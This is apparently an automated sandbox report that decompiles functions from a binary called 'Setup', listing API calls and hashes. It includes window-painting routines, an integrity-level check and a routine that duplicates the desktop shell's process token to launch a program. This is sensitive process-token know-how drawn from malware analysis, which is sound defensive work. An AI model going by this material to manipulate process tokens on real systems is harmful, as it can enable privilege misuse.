                                                                                                                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004954D5
                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 004954F4
                                                                                                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,00000000), ref: 0049552B
                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,000F01FF,004DCC47), ref: 0049554B
                                                                                                                                                              • DuplicateTokenEx.ADVAPI32(004DCC47,000F01FF,00000000,00000002,00000001,?), ref: 0049556C
                                                                                                                                                              • LoadLibraryW.KERNEL32(AdvApi32), ref: 00495586
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CreateProcessAsUserW), ref: 0049559E
                                                                                                                                                              • _memset.LIBCMT ref: 004955BC
                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 004955F1
                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 004955FB
                                                                                                                                                              • CloseHandle.KERNEL32(004DCC47), ref: 00495605
                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0049560F
                                                                                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 0049562E
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Process$CloseHandle$LibraryOpenTokenWindow$AddressCurrentDuplicateExecuteFindFreeLoadProcShellThread_memset
                                                                                                                                                              • String ID: AdvApi32$CreateProcessAsUserW$Progman$open
                                                                                                                                                              • API String ID: 3124362906-4133358785
                                                                                                                                                              • Opcode ID: c75cb5961ac8ebdc9207d7be92574acba839f84e1e4393d84f04d315e8a1b28b
                                                                                                                                                              • Instruction ID: ede81cb90d584a8d042e1cf3f1dbbc8ceb3028ad12f52aa6004268a49ed220c0
                                                                                                                                                              • Opcode Fuzzy Hash: c75cb5961ac8ebdc9207d7be92574acba839f84e1e4393d84f04d315e8a1b28b
                                                                                                                                                              • Instruction Fuzzy Hash: BE514EB1A40208AFEF10DFA4DC49FEEBBB5BF58705F208429F605A62D0D7789944CB64
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 97%
                                                                                                                                                              			E0040B8E0(void* __ebx, PAINTSTRUCT* __ecx, void* __edi, void* __esi, void* __eflags, int* _a16) {
                                                                                                                                                              				signed int _v8;
                                                                                                                                                              				struct tagPAINTSTRUCT _v76;
                                                                                                                                                              				struct tagRECT _v92;
                                                                                                                                                              				struct HBRUSH__* _v96;
                                                                                                                                                              				struct HDC__* _v100;
                                                                                                                                                              				struct tagPAINTSTRUCT _v164;
                                                                                                                                                              				struct HBITMAP__* _v168;
                                                                                                                                                              				struct tagRECT _v184;
                                                                                                                                                              				struct HDC__* _v188;
                                                                                                                                                              				struct HDC__* _v192;
                                                                                                                                                              				void* _v196;
                                                                                                                                                              				struct HBRUSH__* _v200;
                                                                                                                                                              				PAINTSTRUCT* _v204;
                                                                                                                                                              				intOrPtr* _v208;
                                                                                                                                                              				signed int _t75;
                                                                                                                                                              				void* _t80;
                                                                                                                                                              				void* _t123;
                                                                                                                                                              				void* _t169;
                                                                                                                                                              				void* _t170;
                                                                                                                                                              				signed int _t171;
                                                                                                                                                              
                                                                                                                                                              				_t170 = __esi;
                                                                                                                                                              				_t169 = __edi;
                                                                                                                                                              				_t123 = __ebx;
                                                                                                                                                              				_t75 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_v8 = _t75 ^ _t171;
                                                                                                                                                              				_v204 = __ecx;
                                                                                                                                                              				if((E00412640(_v204 + 0x70, 0) & 0x000000ff) == 0) {
                                                                                                                                                              					if(E0041D530(_v204 + 0x70) == 0 || ( *(_v204 + 0x98) >> 0x00000003 & 0x00000001) == 0) {
                                                                                                                                                              						_t154 = _a16;
                                                                                                                                                              						 *_a16 = 0;
                                                                                                                                                              						_t80 = 0;
                                                                                                                                                              					} else {
                                                                                                                                                              						_t154 = _v204;
                                                                                                                                                              						_v188 = BeginPaint( *(_v204 + 4),  &_v164);
                                                                                                                                                              						if(_v188 != 0) {
                                                                                                                                                              							E00416BC0(_v204 + 4,  &_v184);
                                                                                                                                                              							_v168 = CreateCompatibleBitmap(_v188, _v184.right - _v184.left, _v184.bottom - _v184.top);
                                                                                                                                                              							if(_v168 != 0) {
                                                                                                                                                              								_v192 = CreateCompatibleDC(_v188);
                                                                                                                                                              								if(_v192 != 0) {
                                                                                                                                                              									_v196 = SelectObject(_v192, _v168);
                                                                                                                                                              									if(_v196 != 0) {
                                                                                                                                                              										_v200 = CreateSolidBrush( *(_v204 + 0xcc));
                                                                                                                                                              										if(_v200 != 0) {
                                                                                                                                                              											FillRect(_v192,  &_v184, _v200);
                                                                                                                                                              											DeleteObject(_v200);
                                                                                                                                                              											_v208 = E0041D530(_v204 + 0x70);
                                                                                                                                                              											 *((intOrPtr*)( *((intOrPtr*)( *_v208 + 0xc))))(_v208, 1, 0xffffffff, 0, 0, 0, _v192, _v204 + 0xb4, _v204 + 0xb4, 0, 0);
                                                                                                                                                              											BitBlt(_v188, 0, 0, _v184.right, _v184.bottom, _v192, 0, 0, 0xcc0020);
                                                                                                                                                              										}
                                                                                                                                                              										SelectObject(_v192, _v196);
                                                                                                                                                              									}
                                                                                                                                                              									DeleteDC(_v192);
                                                                                                                                                              								}
                                                                                                                                                              								DeleteObject(_v168);
                                                                                                                                                              							}
                                                                                                                                                              							_t154 =  &_v164;
                                                                                                                                                              							EndPaint( *(_v204 + 4),  &_v164);
                                                                                                                                                              							_t80 = 1;
                                                                                                                                                              						} else {
                                                                                                                                                              							_t80 = 0;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				} else {
                                                                                                                                                              					_t154 = _v204;
                                                                                                                                                              					_v100 = BeginPaint( *(_v204 + 4),  &_v76);
                                                                                                                                                              					if(_v100 != 0) {
                                                                                                                                                              						E00416BC0(_v204 + 4,  &_v92);
                                                                                                                                                              						_v96 = CreateSolidBrush( *(_v204 + 0xcc));
                                                                                                                                                              						if(_v96 != 0) {
                                                                                                                                                              							FillRect(_v100,  &_v92, _v96);
                                                                                                                                                              							DeleteObject(_v96);
                                                                                                                                                              						}
                                                                                                                                                              						_t154 =  &_v76;
                                                                                                                                                              						EndPaint( *(_v204 + 4),  &_v76);
                                                                                                                                                              						_t80 = 1;
                                                                                                                                                              					} else {
                                                                                                                                                              						_t80 = 0;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				return E0044F6C8(_t80, _t123, _v8 ^ _t171, _t154, _t169, _t170);
                                                                                                                                                              			}

                                                                                                                                                              0x0040baed
                                                                                                                                                              0x0040bb33
                                                                                                                                                              0x0040bb5e
                                                                                                                                                              0x0040bb5e
                                                                                                                                                              0x0040bb72
                                                                                                                                                              0x0040bb72
                                                                                                                                                              0x0040bb7f
                                                                                                                                                              0x0040bb7f
                                                                                                                                                              0x0040bb8c
                                                                                                                                                              0x0040bb8c
                                                                                                                                                              0x0040bb92
                                                                                                                                                              0x0040bba3
                                                                                                                                                              0x0040bbb8
                                                                                                                                                              0x0040b9f4
                                                                                                                                                              0x0040b9f4
                                                                                                                                                              0x0040b9f4
                                                                                                                                                              0x0040b9f2
                                                                                                                                                              0x0040b914
                                                                                                                                                              0x0040b918
                                                                                                                                                              0x0040b928
                                                                                                                                                              0x0040b92f
                                                                                                                                                              0x0040b945
                                                                                                                                                              0x0040b95d
                                                                                                                                                              0x0040b964
                                                                                                                                                              0x0040b972
                                                                                                                                                              0x0040b97c
                                                                                                                                                              0x0040b97c
                                                                                                                                                              0x0040b982
                                                                                                                                                              0x0040b990
                                                                                                                                                              0x0040b996
                                                                                                                                                              0x0040b931
                                                                                                                                                              0x0040b931
                                                                                                                                                              0x0040b931
                                                                                                                                                              0x0040b92f
                                                                                                                                                              0x0040bbca

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Paint$Begin$BrushCreateDeleteFillObjectRectSolid
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1228145086-0
                                                                                                                                                              • Opcode ID: 979a330e3920737d0a737c78428a28417167aafa3c480625b42e8417f8bfcf09
                                                                                                                                                              • Instruction ID: 07e828fef3e79d3fcd88d721f4db20fa4bdc09ad6a6a4917d27f04c689f7129b
                                                                                                                                                              • Opcode Fuzzy Hash: 979a330e3920737d0a737c78428a28417167aafa3c480625b42e8417f8bfcf09
                                                                                                                                                              • Instruction Fuzzy Hash: 0B81FA71A00218DFEB64DBA4CC58F9AB775FB48304F0086D9E60DA7290DB74AE84CF59
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 60%
                                                                                                                                                              			E00415CA0(struct HWND__** __ecx, struct HWND__* _a4) {
                                                                                                                                                              				int _v8;
                                                                                                                                                              				int _v12;
                                                                                                                                                              				intOrPtr _v16;
                                                                                                                                                              				intOrPtr _v20;
                                                                                                                                                              				struct tagRECT _v36;
                                                                                                                                                              				signed int _v40;
                                                                                                                                                              				struct HWND__* _v44;
                                                                                                                                                              				struct tagRECT _v60;
                                                                                                                                                              				struct tagRECT _v76;
                                                                                                                                                              				struct HMONITOR__* _v80;
                                                                                                                                                              				intOrPtr _v88;
                                                                                                                                                              				intOrPtr _v92;
                                                                                                                                                              				intOrPtr _v96;
                                                                                                                                                              				struct tagMONITORINFO _v120;
                                                                                                                                                              				int _v124;
                                                                                                                                                              				signed int _v128;
                                                                                                                                                              				signed int _v132;
                                                                                                                                                              				signed int _v136;
                                                                                                                                                              				struct HWND__** _v140;
                                                                                                                                                              				long _t106;
                                                                                                                                                              				struct HMONITOR__* _t144;
                                                                                                                                                              				intOrPtr _t188;
                                                                                                                                                              
                                                                                                                                                              				_v140 = __ecx;
                                                                                                                                                              				_v40 = E00416C00(_v140);
                                                                                                                                                              				if(_a4 == 0) {
                                                                                                                                                              					if((_v40 & 0x40000000) == 0) {
                                                                                                                                                              						_a4 = GetWindow( *_v140, 4);
                                                                                                                                                              					} else {
                                                                                                                                                              						_a4 = GetParent( *_v140);
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				_t106 = GetWindowRect( *_v140,  &_v60);
                                                                                                                                                              				if((_v40 & 0x40000000) != 0) {
                                                                                                                                                              					_v44 = GetParent( *_v140);
                                                                                                                                                              					GetClientRect(_v44,  &_v76);
                                                                                                                                                              					GetClientRect(_a4,  &_v36);
                                                                                                                                                              					MapWindowPoints(_a4, _v44,  &_v36, 2);
                                                                                                                                                              					L24:
                                                                                                                                                              					_v16 = _v60.right - _v60.left;
                                                                                                                                                              					_t188 = _v60.bottom - _v60.top;
                                                                                                                                                              					_v20 = _t188;
                                                                                                                                                              					asm("cdq");
                                                                                                                                                              					asm("cdq");
                                                                                                                                                              					_v12 = (_v36.left + _v36.right - _t188 >> 1) - (_v16 - _t188 >> 1);
                                                                                                                                                              					asm("cdq");
                                                                                                                                                              					asm("cdq");
                                                                                                                                                              					_v8 = (_v36.top + _v36.bottom - _t188 >> 1) - (_v20 - _t188 >> 1);
                                                                                                                                                              					if(_v12 + _v16 > _v76.right) {
                                                                                                                                                              						_v12 = _v76.right - _v16;
                                                                                                                                                              					}
                                                                                                                                                              					if(_v12 < _v76.left) {
                                                                                                                                                              						_v12 = _v76.left;
                                                                                                                                                              					}
                                                                                                                                                              					if(_v8 + _v20 > _v76.bottom) {
                                                                                                                                                              						_v8 = _v76.bottom - _v20;
                                                                                                                                                              					}
                                                                                                                                                              					if(_v8 < _v76.top) {
                                                                                                                                                              						_v8 = _v76.top;
                                                                                                                                                              					}
                                                                                                                                                              					return SetWindowPos( *_v140, 0, _v12, _v8, 0xffffffff, 0xffffffff, 0x15);
                                                                                                                                                              				}
                                                                                                                                                              				if(_a4 != 0) {
                                                                                                                                                              					_t106 = GetWindowLongW(_a4, 0xfffffff0);
                                                                                                                                                              					_v128 = _t106;
                                                                                                                                                              					if((_v128 & 0x10000000) == 0 || (_v128 & 0x20000000) != 0) {
                                                                                                                                                              						_a4 = 0;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				_v80 = 0;
                                                                                                                                                              				if(_a4 == 0) {
                                                                                                                                                              					__imp__MonitorFromWindow( *_v140, 2);
                                                                                                                                                              					_v80 = _t106;
                                                                                                                                                              				} else {
                                                                                                                                                              					_t144 = _a4;
                                                                                                                                                              					__imp__MonitorFromWindow(_t144, 2);
                                                                                                                                                              					_v80 = _t144;
                                                                                                                                                              				}
                                                                                                                                                              				while(1) {
                                                                                                                                                              					_v132 = 0 | _v80 != 0x00000000;
                                                                                                                                                              					if(_v132 == 0) {
                                                                                                                                                              						break;
                                                                                                                                                              					}
                                                                                                                                                              					if(0 != 0) {
                                                                                                                                                              						continue;
                                                                                                                                                              					}
                                                                                                                                                              					_v120.cbSize = 0x28;
                                                                                                                                                              					_v124 = GetMonitorInfoW(_v80,  &_v120);
                                                                                                                                                              					while(1) {
                                                                                                                                                              						_v136 = 0 | _v124 != 0x00000000;
                                                                                                                                                              						if(_v136 == 0) {
                                                                                                                                                              							break;
                                                                                                                                                              						}
                                                                                                                                                              						if(0 != 0) {
                                                                                                                                                              							continue;
                                                                                                                                                              						}
                                                                                                                                                              						_v76.left = _v120.rcWork;
                                                                                                                                                              						_v76.top = _v96;
                                                                                                                                                              						_v76.right = _v92;
                                                                                                                                                              						_v76.bottom = _v88;
                                                                                                                                                              						if(_a4 != 0) {
                                                                                                                                                              							GetWindowRect(_a4,  &_v36);
                                                                                                                                                              						} else {
                                                                                                                                                              							_v36.left = _v76.left;
                                                                                                                                                              							_v36.top = _v76.top;
                                                                                                                                                              							_v36.right = _v76.right;
                                                                                                                                                              							_v36.bottom = _v76.bottom;
                                                                                                                                                              						}
                                                                                                                                                              						goto L24;
                                                                                                                                                              					}
                                                                                                                                                              					return 0;
                                                                                                                                                              				}
                                                                                                                                                              				return 0;
                                                                                                                                                              			}


























                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00416C00: GetWindowLongW.USER32(?,000000F0), ref: 00416C0F
                                                                                                                                                              • GetParent.USER32 ref: 00415CD6
                                                                                                                                                              • GetWindow.USER32(?,00000004), ref: 00415CEC
                                                                                                                                                              • GetWindowRect.USER32 ref: 00415D02
                                                                                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00415D23
                                                                                                                                                              • MonitorFromWindow.USER32(00000000,00000002), ref: 00415D5C
                                                                                                                                                              • MonitorFromWindow.USER32(?,00000002), ref: 00415D72
                                                                                                                                                              • GetMonitorInfoW.USER32 ref: 00415DA7
                                                                                                                                                              • GetWindowRect.USER32 ref: 00415E13
                                                                                                                                                              • GetParent.USER32(?), ref: 00415E24
                                                                                                                                                              • GetClientRect.USER32 ref: 00415E35
                                                                                                                                                              • GetClientRect.USER32 ref: 00415E43
                                                                                                                                                              • MapWindowPoints.USER32 ref: 00415E57
                                                                                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,000000FF,000000FF,00000015,?,?), ref: 00415F00
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$Rect$Monitor$ClientFromLongParent$InfoPoints
                                                                                                                                                              • String ID: (
                                                                                                                                                              • API String ID: 882428731-3887548279
                                                                                                                                                              • Opcode ID: 371a9545e01ad43f0f03d9c5f56726953ec5271821ee1bc8f5d6ecfa1c19fa72
                                                                                                                                                              • Instruction ID: caefe87467c79b1c1a426f3a6a43e1fc539b6a4d89845f412648e92d68bc3b50
                                                                                                                                                              • Opcode Fuzzy Hash: 371a9545e01ad43f0f03d9c5f56726953ec5271821ee1bc8f5d6ecfa1c19fa72
                                                                                                                                                              • Instruction Fuzzy Hash: 1591C674D00608DFDF14CFA8D988AEEBBB6BB88304F24C159E516A7394DB349A85CF54
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00494F60(void* __eflags, char _a4) {
                                                                                                                                                              				long _v8;
                                                                                                                                                              				void* _v12;
                                                                                                                                                              				void* _v16;
                                                                                                                                                              				void** _v20;
                                                                                                                                                              				long _v24;
                                                                                                                                                              				char* _v28;
                                                                                                                                                              
                                                                                                                                                              				_v8 = 0x3000;
                                                                                                                                                              				if((E00494F20(__eflags) & 0x000000ff) != 0) {
                                                                                                                                                              					_v16 = 0;
                                                                                                                                                              					_t3 =  &_a4; // 0x4954ee
                                                                                                                                                              					_v12 = OpenProcess(0x1f0fff, 0,  *_t3);
                                                                                                                                                              					if(_v12 != 0) {
                                                                                                                                                              						if(OpenProcessToken(_v12, 0xf01ff,  &_v16) != 0) {
                                                                                                                                                              							_v20 = 0;
                                                                                                                                                              							_v24 = 0;
                                                                                                                                                              							if(GetTokenInformation(_v16, 0x19, 0, 0,  &_v24) == 0 && GetLastError() == 0x7a && _v24 != 0) {
                                                                                                                                                              								_v20 = HeapAlloc(GetProcessHeap(), 0, _v24);
                                                                                                                                                              							}
                                                                                                                                                              							if(_v20 != 0 && GetTokenInformation(_v16, 0x19, _v20, _v24,  &_v24) != 0) {
                                                                                                                                                              								_v28 = GetSidSubAuthorityCount( *_v20);
                                                                                                                                                              								if(_v28 != 0) {
                                                                                                                                                              									_v8 =  *(GetSidSubAuthority( *_v20, ( *_v28 & 0x000000ff) - 1));
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              							if(_v20 != 0) {
                                                                                                                                                              								HeapFree(GetProcessHeap(), 0, _v20);
                                                                                                                                                              							}
                                                                                                                                                              							CloseHandle(_v16);
                                                                                                                                                              						}
                                                                                                                                                              						CloseHandle(_v12);
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				return _v8;
                                                                                                                                                              			}










                                                                                                                                                              APIs
                                                                                                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,TI), ref: 00494F8F
                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,000F01FF,00000000), ref: 00494FAF
                                                                                                                                                              • GetTokenInformation.ADVAPI32(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00494FD9
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00494FE3
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00494FFA
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00495001
                                                                                                                                                              • GetTokenInformation.ADVAPI32(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00495022
                                                                                                                                                              • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00495032
                                                                                                                                                              • GetSidSubAuthority.ADVAPI32(00000000), ref: 00495051
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00495068
                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0049506F
                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00495079
                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00495083
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: HeapProcess$Token$AuthorityCloseHandleInformationOpen$AllocCountErrorFreeLast
                                                                                                                                                              • String ID: TI
                                                                                                                                                              • API String ID: 450452593-904328696
                                                                                                                                                              • Opcode ID: 383203ce0c10d7db99602d8c6fbeb3b5862c58af5cfa7231f5a60be066de4712
                                                                                                                                                              • Instruction ID: edd17054b5bd476a9413c6e0e80b0268b284cd7ee6b01c9050d968d219a2ff58
                                                                                                                                                              • Opcode Fuzzy Hash: 383203ce0c10d7db99602d8c6fbeb3b5862c58af5cfa7231f5a60be066de4712
                                                                                                                                                              • Instruction Fuzzy Hash: 0A412A74A00209EFEB14DFE4DC48BBFBBB8BB48305F208559E611A7290C7749A44DBA1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 83%
                                                                                                                                                              			E00411B30(void* __ebx, signed int __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				void* _v20;
                                                                                                                                                              				signed int _v28;
                                                                                                                                                              				signed int _v32;
                                                                                                                                                              				intOrPtr _v40;
                                                                                                                                                              				char _v48;
                                                                                                                                                              				signed int _v52;
                                                                                                                                                              				char _v124;
                                                                                                                                                              				signed char _v129;
                                                                                                                                                              				signed char _v130;
                                                                                                                                                              				signed int _v131;
                                                                                                                                                              				signed char _v132;
                                                                                                                                                              				short _v136;
                                                                                                                                                              				void _v152;
                                                                                                                                                              				struct HDC__* _v156;
                                                                                                                                                              				signed int _v164;
                                                                                                                                                              				signed int _v168;
                                                                                                                                                              				signed int _v172;
                                                                                                                                                              				signed short _v174;
                                                                                                                                                              				short _v176;
                                                                                                                                                              				intOrPtr _v180;
                                                                                                                                                              				signed int _v184;
                                                                                                                                                              				intOrPtr _v188;
                                                                                                                                                              				char _v192;
                                                                                                                                                              				intOrPtr _v196;
                                                                                                                                                              				intOrPtr _v200;
                                                                                                                                                              				intOrPtr _v204;
                                                                                                                                                              				signed int _t79;
                                                                                                                                                              				signed int _t80;
                                                                                                                                                              				intOrPtr _t84;
                                                                                                                                                              				signed int _t101;
                                                                                                                                                              				void* _t118;
                                                                                                                                                              				intOrPtr _t138;
                                                                                                                                                              				void* _t148;
                                                                                                                                                              				void* _t149;
                                                                                                                                                              				signed int _t150;
                                                                                                                                                              
                                                                                                                                                              				_t149 = __esi;
                                                                                                                                                              				_t148 = __edi;
                                                                                                                                                              				_t142 = __edx;
                                                                                                                                                              				_t118 = __ebx;
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x513f18);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_t79 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_t80 = _t79 ^ _t150;
                                                                                                                                                              				_v52 = _t80;
                                                                                                                                                              				_push(_t80);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				if(_a8 != 0) {
                                                                                                                                                              					 *_a8 = 0;
                                                                                                                                                              					if((E00412640(_a4 + 0x8c, 0) & 0x000000ff) == 0) {
                                                                                                                                                              						L17:
                                                                                                                                                              						_t84 = E0040F0D0(_a4 + 0x8c, _a8);
                                                                                                                                                              					} else {
                                                                                                                                                              						_v40 = E00417320();
                                                                                                                                                              						_t129 =  &_v48;
                                                                                                                                                              						E00413100( &_v48);
                                                                                                                                                              						_v8 = 0;
                                                                                                                                                              						_v20 = GetStockObject(0x11);
                                                                                                                                                              						if(_v20 == 0) {
                                                                                                                                                              							_v20 = GetStockObject(0xd);
                                                                                                                                                              						}
                                                                                                                                                              						if(_v20 != 0) {
                                                                                                                                                              							GetObjectW(_v20, 0x5c,  &_v152);
                                                                                                                                                              							_v192 = 0x20;
                                                                                                                                                              							_v188 = E00415110( &_v124);
                                                                                                                                                              							_v176 = _v136;
                                                                                                                                                              							_v174 = _v129 & 0x000000ff;
                                                                                                                                                              							_v172 = _v132 & 0x000000ff;
                                                                                                                                                              							_t142 = _v131 & 0x000000ff;
                                                                                                                                                              							_v168 = _v131 & 0x000000ff;
                                                                                                                                                              							_v164 = _v130 & 0x000000ff;
                                                                                                                                                              							_t132 = _v152;
                                                                                                                                                              							_v28 = _v152;
                                                                                                                                                              							if(_v28 < 0) {
                                                                                                                                                              								_t142 =  ~_v28;
                                                                                                                                                              								_v28 =  ~_v28;
                                                                                                                                                              							}
                                                                                                                                                              							if( *(_a4 - 0x48) == 0) {
                                                                                                                                                              								_v156 = GetDC(GetDesktopWindow());
                                                                                                                                                              								if(_v156 != 0) {
                                                                                                                                                              									_v32 = GetDeviceCaps(_v156, 0x5a);
                                                                                                                                                              									ReleaseDC(GetDesktopWindow(), _v156);
                                                                                                                                                              									goto L16;
                                                                                                                                                              								} else {
                                                                                                                                                              									_v204 = E00411B10(_t132);
                                                                                                                                                              									_v8 = 0xffffffff;
                                                                                                                                                              									E00417350( &_v48);
                                                                                                                                                              									_t84 = _v204;
                                                                                                                                                              								}
                                                                                                                                                              							} else {
                                                                                                                                                              								_t138 = _a4;
                                                                                                                                                              								_t142 =  *(_t138 - 0x48);
                                                                                                                                                              								_v156 = GetDC( *(_t138 - 0x48));
                                                                                                                                                              								if(_v156 != 0) {
                                                                                                                                                              									_v32 = GetDeviceCaps(_v156, 0x5a);
                                                                                                                                                              									ReleaseDC( *(_a4 - 0x48), _v156);
                                                                                                                                                              									L16:
                                                                                                                                                              									_t101 = _v28 * 0xafc80;
                                                                                                                                                              									asm("cdq");
                                                                                                                                                              									_t142 = _t101 % _v32;
                                                                                                                                                              									_v184 = _t101 / _v32;
                                                                                                                                                              									_v180 = 0;
                                                                                                                                                              									__imp__#420( &_v192, 0x53bb74, E00434050(_a4 + 0x8c));
                                                                                                                                                              									_v8 = 0xffffffff;
                                                                                                                                                              									E00417350( &_v48);
                                                                                                                                                              									goto L17;
                                                                                                                                                              								} else {
                                                                                                                                                              									_v200 = E00411B10(_t138);
                                                                                                                                                              									_v8 = 0xffffffff;
                                                                                                                                                              									E00417350( &_v48);
                                                                                                                                                              									_t84 = _v200;
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              						} else {
